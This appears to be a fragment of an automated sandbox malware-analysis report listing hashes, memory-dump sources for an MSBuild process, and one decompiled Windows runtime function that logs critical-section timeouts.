                                            • Opcode ID: 8785a847c1d0145c8622b27e3c9d557312093b25251b47cc522461516523fa5f
                                            • Instruction ID: e4aea860aa60096efcade86a40f78e2bcfcc5716973814f0f3b17ac8ef23ea61
                                            • Opcode Fuzzy Hash: 8785a847c1d0145c8622b27e3c9d557312093b25251b47cc522461516523fa5f
                                            • Instruction Fuzzy Hash: 4B90027160500D03D291719984147470509E7D0341F51C012A4414654DC7958A9577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdbcf6775d5212dfafe1a2aca233aa9808f51c7a634d69a09dba7785bd777ca8
                                            • Instruction ID: 7c2ca12acb9b0c7534544207ccf8a949df65f546727e30b0f6e9b3cb3db940dd
                                            • Opcode Fuzzy Hash: cdbcf6775d5212dfafe1a2aca233aa9808f51c7a634d69a09dba7785bd777ca8
                                            • Instruction Fuzzy Hash: E490027120504D43D28171998404A470519E7D0345F51C012A4454694DD6658D95B7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d084e34f45e71186e7bf24a3a42ff74b9961cf7b4932665b62f95a31713448a3
                                            • Instruction ID: e4bd8265b687f7542c482179e1b506887ec970ef1594add6a3af5b6d27e7e8a0
                                            • Opcode Fuzzy Hash: d084e34f45e71186e7bf24a3a42ff74b9961cf7b4932665b62f95a31713448a3
                                            • Instruction Fuzzy Hash: 0490027120100D43D24161998404B470509E7E0341F51C017A4514654DC655C8917661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 9d5597053641f5cc6d239f94d630d68a398ad9bd2844e46bd555a21cdaae2db9
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E0109FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0104CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E01095720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E01095720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}










                                            0x0109fdda
                                            0x0109fde2
                                            0x0109fde5
                                            0x0109fdec
                                            0x0109fdfa
                                            0x0109fdff
                                            0x0109fe0a
                                            0x0109fe0f
                                            0x0109fe17
                                            0x0109fe1e
                                            0x0109fe19
                                            0x0109fe19
                                            0x0109fe19
                                            0x0109fe20
                                            0x0109fe21
                                            0x0109fe22
                                            0x0109fe25
                                            0x0109fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109FDFA
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0109FE2B
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0109FE01
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 3ba79f0c5f1728df81815a6c1b397b25423e7d3c6b66494d2204e60f48f32a5c
                                            • Instruction ID: e245201ac683d6661fce4592fb1fe9eaf822f8a42b76a9a5a807242b8ac001f7
                                            • Opcode Fuzzy Hash: 3ba79f0c5f1728df81815a6c1b397b25423e7d3c6b66494d2204e60f48f32a5c
                                            • Instruction Fuzzy Hash: 83F0F672240202BFEB211A46DC06F77BF5AEB44B30F140315F768961E1DA62F920A7F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%